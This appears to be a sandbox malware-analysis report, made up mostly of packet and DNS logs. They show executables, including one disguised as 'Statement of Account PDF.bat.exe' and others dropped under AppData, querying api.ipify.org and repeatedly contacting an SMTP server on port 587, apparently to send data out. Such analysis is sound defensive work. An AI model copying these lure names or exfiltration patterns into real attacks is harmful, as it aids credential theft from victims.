                                                      Apr 26, 2024 10:36:50.190427065 CEST5874978150.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:50.190891981 CEST5874978150.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:50.190965891 CEST5874978150.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:50.191028118 CEST5874978150.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:50.191112995 CEST5874978150.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:50.191162109 CEST5874978150.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:50.191313028 CEST5874978150.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:50.191371918 CEST5874978150.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:50.191761017 CEST5874978150.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:50.191781998 CEST5874978150.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:50.191802979 CEST5874978150.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:50.191860914 CEST5874978150.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:50.191925049 CEST5874978150.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:50.191968918 CEST5874978150.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:50.192024946 CEST5874978150.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:50.192568064 CEST5874978150.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:50.192580938 CEST5874978150.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:50.192632914 CEST5874978150.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:50.192677975 CEST5874978150.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:50.192732096 CEST5874978150.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:50.192745924 CEST5874978150.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:50.192765951 CEST5874978150.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:50.192809105 CEST5874978150.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:50.385075092 CEST5874978150.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:50.385274887 CEST5874978150.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:50.385303974 CEST5874978150.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:50.385320902 CEST5874978150.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:50.385329962 CEST5874978150.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:50.385616064 CEST5874978150.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:50.386251926 CEST5874978150.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:50.448916912 CEST49781587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:50.931499958 CEST49781587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:51.068711996 CEST49777587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:51.127595901 CEST5874978150.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:51.128029108 CEST49781587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:51.129076958 CEST49782587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:51.264890909 CEST5874977750.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:51.265340090 CEST49777587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:51.266341925 CEST49783587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:51.329189062 CEST5874978250.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:51.334577084 CEST49782587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:51.464175940 CEST5874978350.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:51.464627028 CEST49783587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:51.603967905 CEST5874978250.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:51.604675055 CEST49782587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:51.712610006 CEST5874978350.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:51.714802980 CEST49783587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:51.800863981 CEST5874978250.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:51.802799940 CEST49782587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:51.911451101 CEST5874978350.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:51.911760092 CEST49783587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:52.000360966 CEST5874978250.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:52.000869036 CEST49782587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:52.109939098 CEST5874978350.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:52.110620022 CEST49783587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:52.214148045 CEST5874978250.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:52.214175940 CEST5874978250.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:52.214195013 CEST5874978250.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:52.214428902 CEST49782587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:52.219887972 CEST49782587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:52.325287104 CEST5874978350.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:52.325584888 CEST5874978350.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:52.325628042 CEST5874978350.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:52.325654030 CEST49783587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:52.328391075 CEST49783587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:52.423707962 CEST5874978250.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:52.430407047 CEST49782587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:52.532083988 CEST5874978350.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:52.534200907 CEST49783587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:52.626669884 CEST5874978250.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:52.627070904 CEST49782587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:52.699553967 CEST49783587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:52.731260061 CEST5874978350.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:52.731336117 CEST49783587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:52.787659883 CEST49784587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:52.823601961 CEST5874978250.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:52.823879004 CEST49782587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:52.896142006 CEST5874978350.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:52.896193027 CEST49783587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:52.898459911 CEST5874978350.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:52.898500919 CEST49783587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:52.984177113 CEST5874978450.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:52.984246969 CEST49784587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:53.021745920 CEST5874978250.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:53.022043943 CEST49782587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:53.210360050 CEST5874978450.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:53.210480928 CEST49784587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:53.214745998 CEST49784587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:53.218025923 CEST5874978250.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:53.218214989 CEST49782587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:53.276520014 CEST49785587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:53.410368919 CEST5874978450.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:53.412219048 CEST5874978450.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:53.412369013 CEST49784587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:53.412369013 CEST49784587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:53.412926912 CEST5874978450.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:53.416618109 CEST49784587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:53.461055040 CEST5874978250.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:53.470890999 CEST5874978250.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:53.474169970 CEST49782587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:53.477387905 CEST5874978550.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:53.480663061 CEST49785587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:53.670061111 CEST5874978250.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:53.670147896 CEST5874978250.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:53.670810938 CEST49782587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:53.670876980 CEST49782587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:53.670877934 CEST49782587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:53.671061993 CEST49782587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:53.672607899 CEST49782587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:53.708465099 CEST5874978550.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:53.708642006 CEST49785587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:53.872225046 CEST5874978250.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:53.872236013 CEST5874978250.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:53.872251987 CEST5874978250.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:53.872330904 CEST49782587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:53.872366905 CEST5874978250.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:53.872478962 CEST49782587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:53.904931068 CEST5874978550.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:53.905142069 CEST49785587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:54.068154097 CEST5874978250.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:54.068268061 CEST49782587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:54.068305969 CEST5874978250.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:54.068397999 CEST49782587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:54.069108009 CEST5874978250.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:54.072704077 CEST49782587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:54.102890968 CEST5874978550.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:54.103477955 CEST49785587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:54.264677048 CEST5874978250.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:54.264703035 CEST5874978250.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:54.264723063 CEST5874978250.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:54.264842033 CEST5874978250.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:54.264919043 CEST49782587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:54.265065908 CEST49782587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:54.269814968 CEST5874978250.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:54.269833088 CEST5874978250.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:54.270190954 CEST5874978250.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:54.270323038 CEST5874978250.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:54.270356894 CEST5874978250.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:54.270693064 CEST5874978250.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:54.270709991 CEST5874978250.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:54.270725965 CEST5874978250.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:54.270740986 CEST5874978250.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:54.270773888 CEST5874978250.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:54.270792007 CEST5874978250.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:54.270853043 CEST5874978250.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:54.271147966 CEST5874978250.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:54.310610056 CEST5874978550.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:54.310636044 CEST5874978550.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:54.310657024 CEST5874978550.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:54.310683012 CEST49785587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:54.312654018 CEST49785587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:54.493275881 CEST5874978250.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:54.493299961 CEST5874978250.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:54.493331909 CEST5874978250.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:54.493361950 CEST5874978250.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:54.493380070 CEST5874978250.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:54.493395090 CEST5874978250.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:54.493424892 CEST5874978250.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:54.493465900 CEST5874978250.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:54.493482113 CEST5874978250.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:54.493855953 CEST5874978250.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:54.494354963 CEST5874978250.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:54.494386911 CEST5874978250.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:54.494445086 CEST5874978250.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:54.494836092 CEST5874978250.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:54.543030977 CEST5874978550.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:54.545636892 CEST49785587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:54.652028084 CEST49782587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:54.743968964 CEST5874978550.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:54.744157076 CEST49785587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:54.942292929 CEST5874978550.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:54.942625999 CEST49785587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:55.140851021 CEST5874978550.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:55.141107082 CEST49785587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:55.338593960 CEST5874978550.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:55.342082024 CEST49785587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:55.579330921 CEST5874978550.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:55.596251011 CEST5874978550.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:55.596463919 CEST49785587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:55.792727947 CEST5874978550.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:55.792983055 CEST5874978550.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:55.793493032 CEST49785587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:55.793493032 CEST49785587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:55.793557882 CEST49785587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:55.793646097 CEST49785587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:55.794806957 CEST49785587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:55.990876913 CEST5874978550.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:55.990997076 CEST5874978550.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:55.991076946 CEST49785587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:55.991354942 CEST5874978550.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:55.991617918 CEST49785587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:55.992790937 CEST5874978550.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:55.992810011 CEST5874978550.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:55.992835045 CEST5874978550.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:55.992868900 CEST49785587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:55.992943048 CEST49785587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:55.992970943 CEST5874978550.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:55.996623993 CEST49785587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:56.031796932 CEST5874978550.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:56.031902075 CEST49785587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:56.187915087 CEST5874978550.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:56.189121962 CEST5874978550.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:56.189189911 CEST49785587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:56.189817905 CEST5874978550.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:56.189886093 CEST5874978550.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:56.189991951 CEST5874978550.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:56.190098047 CEST5874978550.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:56.190176010 CEST49785587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:56.190207958 CEST49785587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:56.193263054 CEST5874978550.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:56.193603039 CEST5874978550.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:56.199022055 CEST49785587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:56.228240967 CEST5874978550.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:56.228689909 CEST49785587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:56.385457039 CEST5874978550.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:56.385469913 CEST5874978550.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:56.385524988 CEST49785587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:36:56.386250973 CEST5874978550.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:56.386261940 CEST5874978550.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:56.386307955 CEST5874978550.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:56.386832952 CEST5874978550.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:56.394967079 CEST5874978550.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:56.394977093 CEST5874978550.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:56.395025969 CEST5874978550.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:56.395087004 CEST5874978550.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:56.395219088 CEST5874978550.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:56.395231962 CEST5874978550.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:56.424770117 CEST5874978550.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:56.424937010 CEST5874978550.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:56.424987078 CEST5874978550.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:56.581650019 CEST5874978550.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:56.581666946 CEST5874978550.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:56.581680059 CEST5874978550.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:56.582015038 CEST5874978550.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:56.582766056 CEST5874978550.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:36:56.683263063 CEST49785587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:37:04.998109102 CEST49786587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:37:05.135195971 CEST49785587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:37:05.155577898 CEST49782587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:37:05.197303057 CEST5874978650.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:37:05.200620890 CEST49786587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:37:05.331267118 CEST5874978550.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:37:05.331664085 CEST49785587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:37:05.331890106 CEST49787587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:37:05.351583958 CEST5874978250.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:37:05.351917982 CEST49782587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:37:05.352181911 CEST49788587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:37:05.498631001 CEST5874978650.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:37:05.498776913 CEST49786587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:37:05.537266016 CEST5874978750.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:37:05.537331104 CEST49787587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:37:05.565598011 CEST5874978850.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:37:05.565696955 CEST49788587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:37:05.695743084 CEST5874978650.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:37:05.695940971 CEST49786587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:37:05.783169985 CEST5874978750.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:37:05.783319950 CEST49787587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:37:05.833647013 CEST5874978850.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:37:05.833780050 CEST49788587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:37:05.894460917 CEST5874978650.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:37:05.894826889 CEST49786587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:37:05.979835987 CEST5874978750.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:37:05.979962111 CEST49787587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:37:06.030572891 CEST5874978850.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:37:06.030741930 CEST49788587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:37:06.102528095 CEST5874978650.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:37:06.102638006 CEST5874978650.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:37:06.102650881 CEST5874978650.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:37:06.102732897 CEST49786587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:37:06.103991985 CEST49786587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:37:06.193125010 CEST5874978750.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:37:06.193464994 CEST49787587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:37:06.230432034 CEST5874978850.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:37:06.230784893 CEST49788587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:37:06.401124001 CEST5874978750.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:37:06.401143074 CEST5874978750.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:37:06.401154995 CEST5874978750.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:37:06.401201010 CEST49787587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:37:06.454029083 CEST5874978850.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:37:06.454097986 CEST5874978850.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:37:06.454111099 CEST5874978850.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:37:06.454163074 CEST49788587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:37:06.480158091 CEST49786587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:37:06.679934978 CEST5874978650.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:37:06.798178911 CEST5874978650.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:37:06.839524031 CEST49786587192.168.2.450.87.195.61

                                                      UDP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Apr 26, 2024 10:32:57.790539980 CEST5470153192.168.2.41.1.1.1
                                                      Apr 26, 2024 10:32:57.915714979 CEST53547011.1.1.1192.168.2.4
                                                      Apr 26, 2024 10:32:59.370839119 CEST4977753192.168.2.41.1.1.1
                                                      Apr 26, 2024 10:32:59.545531034 CEST53497771.1.1.1192.168.2.4

                                                      DNS Queries

                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                      Apr 26, 2024 10:32:57.790539980 CEST192.168.2.41.1.1.10xbd3dStandard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                      Apr 26, 2024 10:32:59.370839119 CEST192.168.2.41.1.1.10xdd75Standard query (0)mail.fascia-arch.comA (IP address)IN (0x0001)false

                                                      DNS Answers

                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                      Apr 26, 2024 10:32:57.915714979 CEST1.1.1.1192.168.2.40xbd3dNo error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                      Apr 26, 2024 10:32:57.915714979 CEST1.1.1.1192.168.2.40xbd3dNo error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                      Apr 26, 2024 10:32:57.915714979 CEST1.1.1.1192.168.2.40xbd3dNo error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                      Apr 26, 2024 10:32:59.545531034 CEST1.1.1.1192.168.2.40xdd75No error (0)mail.fascia-arch.com50.87.195.61A (IP address)IN (0x0001)false

                                                      HTTP Request Dependency Graph

                                                      • api.ipify.org

                                                      HTTPS Proxied Packets

                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      0192.168.2.449734104.26.12.2054437252C:\Users\user\Desktop\Statement of Account PDF.bat.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-04-26 08:32:58 UTC155OUTGET / HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                      Host: api.ipify.org
                                                      Connection: Keep-Alive
                                                      2024-04-26 08:32:58 UTC211INHTTP/1.1 200 OK
                                                      Date: Fri, 26 Apr 2024 08:32:58 GMT
                                                      Content-Type: text/plain
                                                      Content-Length: 15
                                                      Connection: close
                                                      Vary: Origin
                                                      CF-Cache-Status: DYNAMIC
                                                      Server: cloudflare
                                                      CF-RAY: 87a539ad7b724974-MIA
                                                      2024-04-26 08:32:58 UTC15INData Raw: 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 32 30
                                                      Data Ascii: 102.129.152.220


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      1192.168.2.449737104.26.12.2054437720C:\Users\user\AppData\Roaming\gDdsxauPhk.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-04-26 08:33:04 UTC155OUTGET / HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                      Host: api.ipify.org
                                                      Connection: Keep-Alive
                                                      2024-04-26 08:33:04 UTC211INHTTP/1.1 200 OK
                                                      Date: Fri, 26 Apr 2024 08:33:04 GMT
                                                      Content-Type: text/plain
                                                      Content-Length: 15
                                                      Connection: close
                                                      Vary: Origin
                                                      CF-Cache-Status: DYNAMIC
                                                      Server: cloudflare
                                                      CF-RAY: 87a539d4fa3109d2-MIA
                                                      2024-04-26 08:33:04 UTC15INData Raw: 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 32 30
                                                      Data Ascii: 102.129.152.220


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      2192.168.2.449750104.26.12.2054437220C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-04-26 08:33:14 UTC155OUTGET / HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                      Host: api.ipify.org
                                                      Connection: Keep-Alive
                                                      2024-04-26 08:33:14 UTC211INHTTP/1.1 200 OK
                                                      Date: Fri, 26 Apr 2024 08:33:14 GMT
                                                      Content-Type: text/plain
                                                      Content-Length: 15
                                                      Connection: close
                                                      Vary: Origin
                                                      CF-Cache-Status: DYNAMIC
